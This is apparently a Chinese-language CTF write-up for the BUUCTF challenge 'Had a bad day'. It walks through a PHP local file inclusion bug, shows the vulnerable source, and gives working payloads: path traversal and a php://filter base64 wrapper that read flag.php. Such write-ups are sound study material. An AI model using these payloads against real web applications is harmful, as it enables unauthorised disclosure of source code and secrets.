![BUUCTF:[BSidesCF 2020]Had a bad day_文件名](https://file.cfanz.cn/uploads/png/2023/06/19/16/K5U3f8Q677.png "在这里插入图片描述")
可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息
![BUUCTF:[BSidesCF 2020]Had a bad day_文件名_02](https://file.cfanz.cn/uploads/png/2023/06/19/16/19M487X02c.png "在这里插入图片描述")
的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码
![BUUCTF:[BSidesCF 2020]Had a bad day_文件名_03](https://file.cfanz.cn/uploads/png/2023/06/19/16/8FE0B0VRec.png "在这里插入图片描述")
base64解码读取源码
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
![BUUCTF:[BSidesCF 2020]Had a bad day_php_04](https://file.cfanz.cn/uploads/png/2023/06/19/16/7Dc33K6676.png "在这里插入图片描述")
出现了别的内容,包含成功了flag.php,但是这里也说了flag需要读取
利用php://filter伪协议可以套一层协议读取flag.php
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
套一个字符index符合条件并且传入flag,读取flag.php
![BUUCTF:[BSidesCF 2020]Had a bad day_php_05](https://file.cfanz.cn/uploads/png/2023/06/19/16/K6L3286GC7.png "在这里插入图片描述")
![BUUCTF:[BSidesCF 2020]Had a bad day_php_06](https://file.cfanz.cn/uploads/png/2023/06/19/16/R876Xd8680.png "在这里插入图片描述")
